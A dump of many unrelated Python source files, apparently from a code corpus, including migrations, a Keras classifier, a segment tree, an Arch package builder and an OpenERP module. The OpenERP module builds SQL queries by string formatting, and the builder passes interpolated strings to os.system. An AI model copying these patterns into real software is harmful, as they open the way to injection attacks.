text stringlengths 8 6.05M |
|---|
def read_V_table(fileName):
table = []
f = open("wilxdata/" + fileName)
i = 0
for line in f:
tableRow = []
splittedString = line.split(";")
for s in splittedString:
readyToConvert = s.replace("\n", "").replace(" ", "")
if(readyToConvert != ""):
tableRow.append(int(readyToConvert))
table.append(tableRow)
i += 1
return table
def read_P_table(fileName):
table = []
f = open("wilxdata/" + fileName)
i = 0
for line in f:
tableRow = []
splittedString = line.split(";")
for s in splittedString:
readyToConvert = s.replace("\n", "").replace(" ", "")
if(readyToConvert != ""):
tableRow.append(float(readyToConvert))
table.append(tableRow)
i += 1
return table
def write_V_table(table, vValuesFileName, verbose = False):
with open("wilxdata/" + vValuesFileName, 'w') as f:
nSize = len(table)
kSize = len(table[0])
for i in range(nSize):
for j in range(kSize):
f.write(str(table[i][j]))
f.write("; ")
f.write("\n")
if(i%10 == 0 and verbose): print(i)
if verbose:
print("File created")
def write_P_table(table, fileName, verbose = False):
with open("wilxdata/" + fileName, 'w') as f:
nSize = len(table)
kSize = len(table[0])
for i in range(nSize):
for j in range(kSize):
f.write(str(table[i][j]))
f.write(";")
f.write("\n")
if(i%10 == 0 and verbose): print(i)
if verbose:
print("File created")
def show_V_table(table, width = 4):
nSize = len(table)
kSize = (int)(len(table[0]) / 2)
for n in range (-kSize, kSize + 1):
print ('{0: {width}}'.format(n, width = width), end = '')
print()
for n in range (nSize):
for T0 in range (kSize * 2 + 1):
print ('{0: {width}}'.format(table[n][T0], width = width), end = '')
print()
def show_P_table(table, width = 10):
nSize = len(table)
kSize = len(table[0])
for n in range (kSize):
print ('{0: {width}}'.format(n, width = width), end = '')
print()
for n in range (nSize):
for T0 in range (kSize):
print ('{0: {width}}'.format(table[n][T0], width = width), end = '')
print()
|
"""empty message
Revision ID: bcf2045c4e06
Revises: fd9dff883afd
Create Date: 2018-10-28 10:47:16.732679
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bcf2045c4e06'
down_revision = 'fd9dff883afd'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('field_team',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=32), nullable=True),
sa.Column('espn_code', sa.String(length=8), nullable=True),
sa.Column('espn_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.add_column('espn_projections', sa.Column('player_id', sa.Integer(), nullable=False))
op.add_column('espn_projections', sa.Column('player_name', sa.String(length=64), nullable=True))
op.add_column('espn_projections', sa.Column('team_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'espn_projections', 'field_team', ['team_id'], ['id'])
op.drop_column('espn_projections', 'team')
op.drop_column('espn_projections', 'id')
op.drop_column('espn_projections', 'player')
op.add_column('shark_projections', sa.Column('player_name', sa.String(length=64), nullable=False))
op.add_column('shark_projections', sa.Column('position', sa.String(length=8), nullable=True))
op.add_column('shark_projections', sa.Column('team_id', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'shark_projections', 'field_team', ['team_id'], ['id'])
op.drop_column('shark_projections', 'team')
op.drop_column('shark_projections', 'player')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('shark_projections', sa.Column('player', sa.VARCHAR(length=64), autoincrement=False, nullable=False))
op.add_column('shark_projections', sa.Column('team', sa.VARCHAR(length=8), autoincrement=False, nullable=False))
op.drop_constraint(None, 'shark_projections', type_='foreignkey')
op.drop_column('shark_projections', 'team_id')
op.drop_column('shark_projections', 'position')
op.drop_column('shark_projections', 'player_name')
op.add_column('espn_projections', sa.Column('player', sa.VARCHAR(length=64), autoincrement=False, nullable=True))
op.add_column('espn_projections', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
op.add_column('espn_projections', sa.Column('team', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
op.drop_constraint(None, 'espn_projections', type_='foreignkey')
op.drop_column('espn_projections', 'team_id')
op.drop_column('espn_projections', 'player_name')
op.drop_column('espn_projections', 'player_id')
op.drop_table('field_team')
# ### end Alembic commands ###
|
from django.contrib import admin
from .models import *
# добавить действие в окно выполнить действие
def make_payed(modeladmin,request,queryset):
queryset.update (status=3)
make_payed.short_description = "Пометить как оплаченные"
def make_do(modeladmin,request,queryset):
queryset.update (status=2)
make_do.short_description = "Пометить как выполнен"
def make_new(modeladmin,request,queryset):
queryset.update (status=4)
make_new.short_description = "Пометить как обновленный"
class StatusAdmin (admin.ModelAdmin):
# вывод всех полей в админку
list_display = [field.name for field in Status._meta.fields]
class Meta:
model = Status
# Register your models here.
admin.site.register(Status,StatusAdmin)
class ProductInOrderInline(admin.TabularInline):
model = ProductInOrderModel
extra = 0
# product in basket
class ProductInBasketAdmin (admin.ModelAdmin):
# вывод всех полей в админку
list_display = [field.name for field in ProductInBasketModel._meta.fields]
class Meta:
model = ProductInBasketModel
# Register your models here.
admin.site.register(ProductInBasketModel,ProductInBasketAdmin)
class OrderModelAdmin (admin.ModelAdmin):
# вывод всех полей в админку
# list_display = [field.name for field in Order._meta.fields]
list_display = ('id','status','total_price','customer_surname','customer_name','customer_email','customer_tel','customer_address','token','comments','created')
# list_filter = ['status']
# search_fields = ["id","total_price"]
inlines = [ProductInOrderInline]
actions = [make_payed,make_do,make_new]
# actions = [make_do]
class Meta:
model = OrderModel
# Register your models here.
admin.site.register(OrderModel,OrderModelAdmin)
class ProductInOrderModelAdmin (admin.ModelAdmin):
# вывод всех полей в админку
list_display = [field.name for field in ProductInOrderModel._meta.fields]
class Meta:
model = ProductInOrderModel
# Register your models here.
admin.site.register(ProductInOrderModel,ProductInOrderModelAdmin)
|
import numpy as np
import matplotlib.pyplot as plt
import math
def tail_prob(chi,t):
tail_Pr = []
for i in range(0,len(t)):
tail_Pr.append(chi[chi>(t[i]+np.mean(chi))].shape[0]/(1.0*len(chi)))#smaple mean = 0
return tail_Pr
n=3
k = 10000
t = np.linspace(0,50,1e4)
data = np.zeros((k,))
###########################################################
#chi2 = Sigma(Xi^2) Xi -> N(0,1)
###########################################################
#data generation emperically
for i in range(n):
x = np.random.normal(0,1,(k,))
data = data + x**2
tail_probs = np.array(tail_prob(data,t))#computing the tail probability
gaussian = np.random.normal(0,np.sqrt(2*n),(k,))
bound =np.array(tail_prob(gaussian,t))#computing the bound
fig = plt.figure()
plt.plot(t,tail_probs,'b',label='Chi-square')
plt.plot(t,bound,'r',label='Reference Gaussian')
labels = ['Chi-square','Reference Gaussian']
plt.legend(labels)
fig.suptitle('N = '+str(n))
plt.xlabel('t')
plt.ylabel('Pr({X-u >t})')
plt.show()
|
# Generated by Django 2.2.5 on 2019-11-29 14:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('trips', '0007_auto_20191128_2103'),
]
operations = [
migrations.RenameField(
model_name='trip',
old_name='hotels',
new_name='hotel',
),
migrations.RenameField(
model_name='trip',
old_name='transportations',
new_name='transportation',
),
]
|
#!/usr/bin/python
#Stop gripper during moving.
from dxl_util import *
from _config import *
import time
import math
import numpy as np
#Setup the device
dxl= TDynamixel1(DXL_TYPE,dev=DEV)
dxl.Id= DXL_ID
dxl.Baudrate= BAUDRATE
dxl.Setup()
dxl.EnableTorque()
#Move to initial position
p_start= 2100
dxl.MoveTo(p_start)
time.sleep(0.5) #wait .5 sec
print 'Current position=',dxl.Position()
print 'Type current position, and then hold the gripper to prevent moving'
p_trg= int(raw_input('type target: '))
dxl.MoveTo(p_trg,blocking=False)
for i in range(7):
time.sleep(0.1) #wait 0.1 sec
print 'Current position=',dxl.Position()
print 'Reset the target position to the current position',dxl.Position()
dxl.MoveTo(dxl.Position(),blocking=True)
#dxl.DisableTorque()
dxl.Quit()
|
import random
import tensorflow as tf
import numpy as np
import pandas as pd
def read_dataset(filename, lines):
train_test_ratio = 0.8
df = pd.read_csv(filename, nrows=lines)
x_matrix = df[df.columns[0]].values
x_vals = encode_words(x_matrix)
train_x = x_vals[:int(lines * train_test_ratio)]
test_x = x_vals[int(lines * train_test_ratio):]
y_matrix = df[df.columns[1]].values
y_vals = encode_langs(y_matrix)
train_y = y_vals[:int(lines * train_test_ratio)]
test_y = y_vals[int(lines * train_test_ratio):]
print("Finished reading", filename)
return np.asarray(train_x), np.asarray(train_y), np.asarray(test_x), np.asarray(test_y)
def decode_word(one_hot_word):
word = ""
for one_hot_char in one_hot_word:
for i in range(len(one_hot_char)):
if one_hot_char[i] == 1:
word += chr(map_to_char[i])
break
return word
def encode_words(words):
letter_count = 0
global longest_word_len
global char_to_map
global map_to_char
out = []
c = 0
for word in words:
current_word = []
c += 1
try:
for letter in word:
if len(word) > longest_word_len:
longest_word_len = len(word)
if ord(letter) not in char_to_map:
char_to_map[ord(letter)] = letter_count
map_to_char[letter_count] = ord(letter)
current_word.append(letter_count)
letter_count += 1
else:
current_word.append(char_to_map[ord(letter)])
except TypeError:
print("Unreadable word at line " + str(c))
out.append(current_word)
for word_idx in range(len(out)):
word = out[word_idx]
one_hot_word = []
for i in range(longest_word_len):
one_hot_word.append([0] * letter_count)
for i in range(len(word)):
one_hot_word[i][word[i]] = 1
out[word_idx] = one_hot_word
return out
def encode_langs(arr):
count = 0
labels = {}
out = []
for item in arr:
if item not in labels:
labels[item] = count
languages.append(item)
count += 1
out.append(labels[item])
l = len(labels)
for i in range(len(out)):
a = [0] * l
a[out[i]] = 1
out[i] = a
return out
def encode_user_word(word):
global num_letters
global longest_word_len
out = []
for i in range(longest_word_len):
out.append([0] * num_letters)
for idx, c in enumerate(word):
c_code = ord(c)
if c_code not in char_to_map:
print("Character", c, "not recognized")
continue # skip unrecognized chars
m = char_to_map[c_code]
out[idx][m] = 1
return out
def create_layers(i_shape):
layers = [
tf.keras.layers.Flatten(input_shape=i_shape),
# tf.keras.layers.Embedding(num_letters, 50),
# tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(100)),
tf.keras.layers.Dense(700, activation=tf.nn.relu),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(200, activation=tf.nn.relu),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(len(languages), activation=tf.nn.softmax)
]
return layers
def create_model(x, y):
global longest_word_len
global num_letters
layers = create_layers((longest_word_len, num_letters))
m = tf.keras.models.Sequential()
for layer in layers:
m.add(layer)
m.compile(
optimizer='adam',
loss="categorical_crossentropy",
metrics=['accuracy'])
m.fit(x, y, epochs=7)
return m
def guess_words_from_data(model, x, y):
num = 5
w = x[:num]
l = y[:num]
for i in range(num):
p = model.predict(np.asarray([w[i]]))
d = decode_word(w[i])
a = l[i]
print("The model predicts:", d, "-", languages[p.argmax()] + ". The actual language is", languages[a.argmax()])
def guess_words_from_input(model):
i = input("Enter a word \n")
while i != "quit":
one_hot_word = np.asarray([encode_user_word(i)])
prediction = model.predict(one_hot_word)
print(languages)
print(prediction)
print("The model predicts: ", i, "-", languages[prediction.argmax()])
i = input()
def game(model, x, y):
player_score = 0
bot_score = 0
idx = random.randrange(0, len(x))
one_hot_word = x[idx]
decoded_word = decode_word(one_hot_word)
correct = languages[y[idx].argmax()]
i = input(decoded_word)
while i is not "quit":
bot_guess = languages[model.predict(np.asarray([one_hot_word])).argmax()]
print("You guessed", i, "while the bot guessed", bot_guess)
print("The actual answer is", correct)
if bot_guess == correct:
bot_score += 1
if i == correct:
player_score += 1
print("Your score:", player_score, " bot score:", bot_score)
idx = random.randrange(0, len(x))
one_hot_word = x[idx]
decoded_word = decode_word(one_hot_word)
correct = languages[y[idx].argmax()]
i = input(decoded_word)
if __name__ == "__main__":
data_length = 30000
longest_word_len = 0
languages = []
map_to_char = {}
char_to_map = {}
# requested_dataset = input("Enter the dataset name to use \n")
requested_dataset = "EasternEurope"
p = "data/" + requested_dataset + ".csv"
x_train, y_train, x_test, y_test = read_dataset(p, data_length)
num_letters = len(map_to_char)
print(languages)
print(num_letters, "letters - longest word is", longest_word_len, "letters long")
model = create_model(x_train, y_train)
model.evaluate(x_test, y_test)
# guess_words_from_input(model)
game(model, x_train, y_train)
|
from setuptools import setup
setup(name='ditk',
version='alpha',
description='CSCI 548 Project- Data Integration Toolkit',
url='https://github.com/HaozheGuAsh/CSCI548-Relation-Extraction',
author=' ',
license='MIT',
packages=['ditk'],
zip_safe=False)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from datetime import datetime
class oper_cuota_generation(osv.osv):
_name = 'oper.cuota.generation'
_columns = {
'period_id': fields.many2one('account.period','Periodo'),
'socio_id': fields.many2one('res.partner', 'Socio'),
'recaudador_id': fields.many2one('oper.recaudador', 'Recaudador'),
'partner_id': fields.many2one('res.partner', 'Institucion', domain=[('is_institucion','=',True)]),
}
def generar_couta(self, cr, uid, ids, context=None):
contracts=''
date=''
sql=''
amount=0
no_contracts=True
date = datetime.now()
date_short= "'"+str(date.day)+'-'+str(date.month)+'-'+str(date.year)+"'"
if not context['partner_id'] and not context['recaudador_id']:
raise osv.except_osv(('Aviso!'),('Debe seleccionar alguna Institución o Recaudador'))
sql=("""select id, amount_cuotas, q_cuotas, product_id, socios_id, recaudador_id, partner_id
from oper_contrato where activo=True and date_start <= '%s'""" % str(date))
if context['partner_id']: sql += (' and partner_id = % s' % str(context['partner_id']))
if context['recaudador_id']: sql += (' and recaudador_id = % s' % str(context['recaudador_id']))
if context['socio_id']: sql += (' and socios_id = % s' % str(context['socio_id']))
cr.execute(sql)
for i in cr.fetchall():
no_contracts=False
amount= i[1]
cr.execute('select sum(mount) from oper_contrato_anexo where id_anexo=%d' % i[0])
anexos=cr.fetchone()
if anexos and anexos[0]:
amount+=anexos[0]
cr.execute("""insert into oper_cuota
(amount,n_cuota,servicio_id,fecha_emision,period_id,socio_id,recaudador_id,partner_id, contrato_id)
values(%d,%d,%d,%s,%d,%d,%d,%d,%d)
""" % (amount,i[2],i[3],date_short,context['period_id'],i[4],i[5],i[6],i[0]))
if no_contracts: raise osv.except_osv(('Aviso!'),('No hay contratos para su seleccion'))
return True
oper_cuota_generation() |
training_percent = 0.7
testing_percent = 1 - training_percent
previous_data_points = 3
currency = ""
currency_index = 0
data_set_length = 0
training_set_length = 0
testing_set_length = 0
p = 0
d = 0
q = 0
epochs = 50
batch_size = 2
|
import tensorflow as tf
from tensorflow.keras.layers import Input, SimpleRNN, LSTM, GRU, Dense, Activation
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras import backend as K
def naive_RNNs(init, input_shape, mode='singal-layer'):
# input_shape: [batch, timesteps, features]
inputs = Input(shape=input_shape)
if mode =='singal-layer':
x = SimpleRNN(init.RNNUnits)(inputs)
else:
# multi-layer
x, _ = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
x, _ = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(x)
_, x = SimpleRNN(init.RNNUnits, return_sequences=True, return_state=True)(x)
outputs = Dense(init.FeatDims)(x)
if init.task == 'classification':
outputs = Activation('softmax')(outputs)
model = Model(inputs=inputs, outputs=outputs)
return model
def LSTMs(init, input_shape, mode='singal-layer'):
# input_shape: [batch, timesteps, features]
inputs = Input(shape=input_shape)
if mode =='singal-layer':
x = LSTM(init.RNNUnits)(inputs)
else:
# multi-layer
x, _ = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
x, _ = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(x)
_, x = LSTM(init.RNNUnits, return_sequences=True, return_state=True)(x)
outputs = Dense(init.FeatDims)(x)
if init.task == 'classification':
outputs = Activation('softmax')(outputs)
model = Model(inputs=inputs, outputs=outputs)
return model
def GRUs(init, input_shape, mode='singal-layer'):
# input_shape: [batch, timesteps, features]
inputs = Input(shape=input_shape)
if mode =='singal-layer':
x = GRU(init.RNNUnits)(inputs)
else:
# multi-layer
x, _, _ = GRU(init.RNNUnits, return_sequences=True, return_state=True)(inputs)
x, _, _ = GRU(init.RNNUnits, return_sequences=True, return_state=True)(x)
_, _, x = GRU(init.RNNUnits, return_sequences=True, return_state=True)(x)
outputs = Dense(init.FeatDims)(x)
if init.task == 'classification':
outputs = Activation('softmax')(outputs)
model = Model(inputs=inputs, outputs=outputs)
return model
|
from functools import wraps
from natsort import natsorted, ns
import graphene
class OrderedList(graphene.List):
def __init__(self, of_type, **kwargs):
additional_kwargs = {
'order_direction': graphene.String(),
}
if of_type != graphene.String:
additional_kwargs['order_by'] = graphene.String()
super().__init__(of_type, **additional_kwargs, **kwargs)
def sorting_func(items, order_direction, **kwargs):
return natsorted(items, reverse=order_direction == 'desc', alg=ns.IGNORECASE, **kwargs)
def ordered_case(func):
@wraps(func)
def func_wrapper(self, info, order_by=None, order_direction='asc', **kwargs):
items = func(self, info, **kwargs)
if order_by is not None:
items = sorting_func(items, order_direction=order_direction, key=lambda item: getattr(item, order_by))
return items
return func_wrapper
def ordered_strings(func):
@wraps(func)
def func_wrapper(self, info, order_direction='asc', **kwargs):
items = func(self, info, **kwargs)
items = sorting_func(items, order_direction=order_direction)
return items
return func_wrapper
|
from typing import Iterator
def reduction(x):
# type: (int) -> Iterator[int]
"""
reduction sequence from n to 1 by either adding 1, subtracting 1, or dividing by 2
proof:
n | n mod 4 | path
--|---------|----------------------
1 | 1 | 1
2 | 2 | 2 -> 1
3 | 3 | 3 -> 2 -> 1
4 | 0 | 4 -> 2 -> 1
5 | 1 | 5 -> 4 -> 2 -> 1
6 | 2 | 6 -> 3 -> 2 -> 1
7 | 3 | 7 -> 8 -> 4 -> 2 -> 1
8 | 0 | 8 -> 4 -> 2 -> 1
The case when n is 3 is special.
analysis:
time complexity: O(log N)
space complexity: O(1)
"""
yield x
while x > 1:
r = x % 4
if r in {0, 2}:
x /= 2
elif r == 1 or x == 3:
x -= 1
else:
x += 1
yield x
def answer(n):
# type: (str) -> int
"""
minimum number of operations to reduce n to 1 by either adding 1, subtracting 1, or dividing by 2
"""
sequence = reduction(int(n))
return sum(1 for _ in sequence) - 1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2009 Francesco Piccinno
#
# Author: Francesco Piccinno <stack.box@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# TODO:
# - dependencies handling
# - for -git/-svn packages move the src folder to source/ instead dropping
# it and re-fetch the sources everytime
import os
import os.path
import re
import sys
import shutil
import glob
from optparse import OptionParser
from pylibs.utils import ConsoleP, foreach_pkgbuild
from pylibs.pkgbuild import PkgBuild
from subprocess import Popen, STDOUT, PIPE
SKEL = """# This file is autogenerated by pkg-builder
DLAGENTS=('ftp::/usr/bin/wget -c --passive-ftp -t 3 --waitretry=3 -O %o %u'
'http::/usr/bin/wget -c -t 3 --waitretry=3 -O %o %u'
'https::/usr/bin/wget -c -t 3 --waitretry=3 --no-check-certificate -O %o %u'
'rsync::/usr/bin/rsync -z %u %o'
'scp::/usr/bin/scp -C %u %o')
CARCH="i686"
CHOST="i686-pc-linux-gnu"
CFLAGS="-march=i686 -mtune=generic -O2 -pipe -fomit-frame-pointer"
CXXFLAGS="-march=i686 -mtune=generic -O2 -pipe -fomit-frame-pointer"
MAKEFLAGS="-j%NCPU%"
BUILDENV=(fakeroot !distcc color ccache !xdelta)
OPTIONS=(strip docs libtool emptydirs zipman)
INTEGRITY_CHECK=(md5)
DOC_DIRS=(usr/{,share/}{info,doc,gtk-doc} opt/*/{info,doc,gtk-doc})
STRIP_DIRS=(bin lib sbin usr/{bin,lib,sbin,local/{bin,lib,sbin}} opt/*/{bin,lib,sbin})
PKGDEST="%PKGDEST%"
SRCDEST="%SRCDEST%"
PACKAGER="Francesco Piccinno <stack.box@gmail.com>"
BUILDSCRIPT='PKGBUILD'
PKGEXT='.pkg.tar.xz'
SRCEXT='.src.tar.xz'
DB_COMPRESSION='gz'
DB_CHECKSUMS=(md5)
# vim: set ft=sh ts=2 sw=2 et:
"""
OUTFILE = os.path.join(os.getenv("HOME", "/root"), ".makepkg.conf")
class Builder(ConsoleP):
def __init__(self, src, tmp, dst, nodeps=False, force=False, \
nonamcap=False):
ConsoleP.__init__(self, 'pkgbuilder')
self.built = 0
self.failed = []
self.src, self.tmp, self.dst = os.path.abspath(src), \
os.path.abspath(tmp), \
os.path.abspath(dst)
# We have to create a makepkg.conf file that contains
# proper CFLAGS and PKGDEST, SRCDEST variable (dst, tmp)
# and place under ~/.makepkg.conf
mkp = SKEL.replace("%NCPU%", "3") \
.replace("%PKGDEST%", self.dst) \
.replace("%SRCDEST%", self.tmp)
self.nodeps = nodeps
self.nonamcap = nonamcap
self.force = force
f = open(OUTFILE, "w+")
f.write(mkp)
f.close()
def build_all(self):
st_size = os.stat('/var/log/pacman.log').st_size
for pkgdir in foreach_pkgbuild(self.src):
rootdir = os.path.basename(pkgdir)
if 'lkm-skel' in pkgdir:
continue
self.build_pkg(pkgdir)
f = open('/var/log/pacman.log', 'r')
f.seek(st_size)
installed = f.read()
f.close()
packs = re.findall(
r"\[\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}\]\s(\w+)\s([^\s]+)\s(.*)$",
installed, re.MULTILINE)
packs = map(lambda x: x[1], filter(lambda x: x[0] == 'installed', packs))
if packs:
self.info('These packages were installed as dependencies ' \
'and will be dropped:')
self.info('%s' % packs)
os.system('sudo pacman -Rd %s' % ' '.join(packs))
def create_repo(self):
if self.built == 0:
return
origdir = os.getcwd()
os.chdir(self.dst)
os.system("repo-add archpwn.db.tar.gz %s > /dev/null 2>&1" % \
" ".join(glob.glob("*.pkg.tar.xz")))
self.info("archpwn.db succesfully updated.")
os.chdir(origdir)
os.system("sudo pacman -Sy --config scripts/archpwn-pacman.conf")
self.info("archpwn.db succesfully synced.")
def build_pkg(self, dir_path):
dir = os.path.basename(dir_path)
try:
outfile = PkgBuild(os.path.join(dir_path, "PKGBUILD")).get_output()
except:
self.error("Problem while building %s (PKGBUILD malformed)" % dir)
return
if not self.force and os.path.isfile(os.path.join(self.dst, outfile)):
self.info("Package %s already built" % dir)
return
self.info("Building package %s" % dir)
origdir = os.path.abspath(os.getcwd())
logf = open(os.path.join(origdir, 'logs', 'build_%s.log' % dir), 'w')
os.chdir(dir_path)
mkpkg = "makepkg --noconfirm -s%s%s" % (
(self.force) and " -f" or "",
(self.nodeps) and " -d" or "")
ret = None
env = os.environ
env['LC_ALL'] = 'C'
proc = Popen(mkpkg, env=env, shell=True, stdout=PIPE, stderr=STDOUT)
try:
while ret is None:
buff = os.read(proc.stdout.fileno(), 1024)
if buff:
sys.stdout.write(buff)
sys.stdout.flush()
logf.write(buff)
ret = proc.poll()
except KeyboardInterrupt:
proc.kill()
ret = -1
self.warning("makepkg process killed.")
logf.close()
# Cleaning up the dir by removing 'pkg' and 'src' directories
shutil.rmtree("src", True)
shutil.rmtree("pkg", True)
# Restore original directory
os.chdir(origdir)
if ret != 0:
self.error("Error building %s. (Error status: %d)" % (dir, ret))
self.warning("Take a look to logs/build_%s.log" % dir)
self.failed.append(dir)
elif not self.nonamcap:
self.built += 1
output = os.path.join(self.dst, outfile)
if os.system("namcap %s > logs/namcap_%s.log" % (output, dir)):
self.warning("Namcap has detected some problems. Take "
"a look to logs/namcap_%s.log" % dir)
if __name__ == "__main__":
parser = OptionParser(usage="%s [options] <repodir> <srcdest> <pkgdest>" % sys.argv[0])
parser.add_option("-d", "--nodeps",
action="store_true", dest="nodeps", default=False,
help="don't include dependecy checking")
parser.add_option("-f", "--force",
action="store_true", dest="force", default=False,
help="force rebuild if package is already present")
parser.add_option("-x", "--exclude-namcap",
action="store_true", dest="nonamcap", default=False,
help="exclude namcap checking")
(options, args) = parser.parse_args()
if len(args) != 3:
parser.print_help()
sys.exit(-1)
builder = Builder(args[0], args[1], args[2], \
options.nodeps, options.force, options.nonamcap)
builder.build_all()
builder.create_repo()
if builder.failed:
builder.warning("Not all packages have been generated successfully.")
builder.warning("These are the missing: %s" % str(builder.failed))
os.remove(OUTFILE)
|
def nhuman(Y):
x = Y
print(x)
nhuman(10)
|
class SegmentTree:
def build_tree_hint(self):
message = """
Build Segment Tree
------------------------------------
Purpose : Building a Segment tree for the given array and query
Method : Recursion
Time Complexity : Worst Case - O(n)
Working Hint:
Initialize relevant leaf nodes with array elements, and assign result of the query to the parent node.
Pseudocode :
--> if array_start_index == array_end_index:
--> Assign the corresponding leaf node the value of array element at array_start_index
--> return leaf node value
--> Find middle element of the array range [array_start_index, array_end_index]
--> Perform query on leaf nodes values and assign result to parent node
--> Return Parent Node Value
Example:
--> obj = SegmentTree([1,2,3,4,5,6,7], 2, 5) # (2,5) is the range of query to be performed on.
--> obj.build_tree(0,6) # 0 and 6 are starting and ending index of array
"""
print(message)
def get_result_hint(self):
message = """
Get Result of Range Query from Segment Tree
------------------------------------
Purpose : Building a Segment tree for the given array and query
Method : Recursion
Time Complexity : Worst Case - O(logn)
Working Hint:
Reach child nodes for the corresponding range, and return result of the query to the parent node.
Pseudocode :
--> if array_start_index and array_ending_index are inside query range:
--> return leaf node value
--> if array_start_index or array_ending_index is outside query range:
--> return constant for corresponding function
--> Find middle element of the array range [array_start_index, array_end_index]
--> Perform query on leaf nodes values and return the result
Example:
--> obj = SegmentTree([1,2,3,4,5,6,7], 2, 5) # (2,5) is the range of query to be performed on.
--> obj.build_tree(0,6) # 0 and 6 are starting and ending index of array
--> obj.get_result(0,6) # 0 and 6 are starting and ending index of array
"""
print(message)
def __init__(self,arr,l,r,function = 'add'):
self.tree = [None for _ in range(3*len(arr))]
self.arr = arr
self.l = l
self.r = r
self._function = ('add', 'min', 'max', 'xor', 'product')
self.func = function
@property
def get_function_list(self):
"""
Get The list of the avaliable functions available to create the segment tree of.
Returns:
tuple: Tuple of functions
"""
return self._function
def build_tree(self, ss, se, idx = 0):
"""
Build the segment tree of the corresponding function.
Args:
ss ([int]): Starting Index
se ([int]): Ending Index
idx (int, optional): Index of segment tree node. Defaults to 0.
"""
if ss==se:
self.tree[idx] = self.arr[ss]
return self.tree[idx]
mid = (ss + se) // 2
if self.func == 'add':
self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) + self.build_tree(mid+1, se, 2*idx+2)
elif self.func == 'min':
self.tree[idx] = min(self.build_tree(ss, mid, 2*idx+1), self.build_tree(mid+1, se, 2*idx+2))
elif self.func == 'max':
self.tree[idx] = max(self.build_tree(ss, mid, 2*idx+1), self.build_tree(mid+1, se, 2*idx+2))
elif self.func == 'xor':
self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) ^ self.build_tree(mid+1, se, 2*idx+2)
elif self.func == 'product':
self.tree[idx] = self.build_tree(ss, mid, 2*idx+1) * self.build_tree(mid+1, se, 2*idx+2)
return self.tree[idx]
def get_result(self, ss, se, idx = 0):
"""[
Args:
ss ([int]): Starting Index
se ([int]): Ending Index
idx (int, optional): Index of segment tree node. Defaults to 0.
Returns:
int/float: Result for the given range
"""
if ss >= self.l and se <= self.r:
return self.tree[idx]
if se < self.l or ss > self.r:
if self.func == 'add':
return 0
elif self.func == 'min':
return 10**9
elif self.func == 'max':
return -10**9
elif self.func == 'xor':
return 0
elif self.func == 'product':
return 1
mid = (ss + se) // 2
if self.func == 'add':
return self.get_result(ss,mid,2*idx+1) + self.get_result(mid+1,se,2*idx+2)
elif self.func == 'min':
return min(self.get_result(ss,mid,2*idx+1), self.get_result(mid+1,se,2*idx+2))
elif self.func == 'max':
return max(self.get_result(ss,mid,2*idx+1), self.get_result(mid+1,se,2*idx+2))
elif self.func == 'xor':
return self.get_result(ss,mid,2*idx+1) ^ self.get_result(mid+1,se,2*idx+2)
elif self.func == 'product':
return self.get_result(ss,mid,2*idx+1) * self.get_result(mid+1,se,2*idx+2)
|
"""
Api key queries
"""
from typing import Generator, List, Optional, Union
import warnings
from typeguard import typechecked
from ...helpers import Compatible, format_result, fragment_builder
from .queries import gql_api_keys, GQL_API_KEYS_COUNT
from ...types import ApiKey as ApiKeyType
from ...utils import row_generator_from_paginated_calls
class QueriesApiKey:
"""
Set of ApiKey queries
"""
# pylint: disable=too-many-arguments,too-many-locals
def __init__(self, auth):
"""
Initializes the subclass
Parameters
----------
auth : KiliAuth object
"""
self.auth = auth
# pylint: disable=dangerous-default-value
@Compatible(['v2'])
@typechecked
def api_keys(self, api_key_id: Optional[str] = None, user_id: Optional[str] = None,
api_key: Optional[str] = None, skip: int = 0,
fields: List[str] = ['id', 'name', 'createdAt', 'revoked'],
first: Optional[int] = 100,
disable_tqdm: bool = False,
as_generator: bool = False) -> Union[List[dict], Generator[dict, None, None]]:
# pylint: disable=line-too-long
"""
Gets a generator or a list of API keys that match a set of constraints
Parameters
----------
api_key_id :
The unique id of the api key to retrieve.
user_id :
Identifier of the user (you can only query your own api keys).
api_key :
Value of the api key (you can only query your own api keys).
skip :
